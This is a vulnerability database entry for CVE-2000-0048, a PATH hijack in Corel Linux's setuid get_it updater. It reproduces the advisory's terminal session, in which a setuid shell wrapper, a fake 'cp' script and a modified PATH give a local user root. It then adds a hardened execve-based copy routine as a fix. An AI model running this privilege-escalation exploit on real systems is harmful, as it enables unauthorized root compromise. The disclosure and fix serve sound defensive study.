Corel Linux get_it PATH Vulnerability


Vulnerability ID: 1105689
Vulnerability type: Other
Published: 2000-01-12
Updated: 2005-05-02
CVE ID: CVE-2000-0048
CNNVD-ID: CNNVD-200001-033
Platform: Linux
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/19723
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-033
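|Vulnerability details
The get_it program in Corel Linux Update contains a vulnerability. A local user can gain root access by specifying an alternate cp program.
|Exploit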
source: http://www.securityfocus.com/bid/928/info

A component of the "Corel Update" utility distributed with Corel's Linux OS is vulnerable to a local PATH vulnerability. The binary "get_it", which is stored in /usr/X11R6/bin, is setuid root installed by default on all Corel LinuxOS systems (it's part of their .deb package install/update utils). get_it relies on PATH to be valid when it calls 'cp' (without the full path), making it possible to spawn an arbitrary program (called 'cp') with inherited root privs by changing the first searched path to one in which a malicious cp lies. The consequences are immediate local root compromise.

CorelLinux:~$ id
uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~$ cat misu.c
#include <stdio.h>
#include <unistd.h>

main(argc,argv)
int argc;
char **argv;
{
if (argc==2);
setuid(atoi(argv[1]));
execlp("/bin/bash","/bin/bash",NULL);
}
CorelLinux:~$ cc -o misu misu.c
CorelLinux:~$ pwd
/home/tascon
CorelLinux:~$ cat cp
echo $1 $2 $3
/home/tascon/misu 0
CorelLinux:~$ export PATH=.:$PATH
CorelLinux:~$ get_it
/usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~# exit
exit
/usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
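
A hardened way for a setuid program to run cp, given here as an added example that is not Corel's code and not part of the original advisory. The helper name `safe_copy`, the `/bin/cp` location and the choice to drop privileges before the copy are assumptions; the page does not show how get_it actually invokes cp.

```c
#define _POSIX_C_SOURCE 200809L   /* expose POSIX declarations under strict -std modes */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumption: the trusted cp lives here; adjust for the target distribution. */
#define TRUSTED_CP "/bin/cp"

/* Hypothetical helper: copy src to dst from a setuid program without trusting
 * anything the invoking user controls. Returns cp's exit status, -1 on error. */
int safe_copy(const char *src, const char *dst)
{
    /* Fixed environment: the caller's PATH (e.g. ".:$PATH") never reaches cp. */
    char *const clean_env[] = { "PATH=/bin:/usr/bin", NULL };
    char *const args[] = { "cp", "--", (char *)src, (char *)dst, NULL };
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Assumption: the copy itself does not need root, so drop to the real
         * gid/uid first (group before user) and abort if either call fails. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        /* execve() runs exactly this file; it never searches PATH, unlike
         * execlp(), execvp(), system() or popen(). */
        execve(TRUSTED_CP, args, clean_env);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s SRC DST\n", argv[0]);
        return EXIT_FAILURE;
    }
    return safe_copy(argv[1], argv[2]) == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

With this pattern the `export PATH=.:$PATH` step in the session above has no effect on which binary runs, and the child no longer holds root when it does.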
|References

Source: linux.corel.com
Link: http://linux.corel.com/support/clos_patch1.htm
Source: BID
Name: 928
Link: http://www.securityfocus.com/bid/928
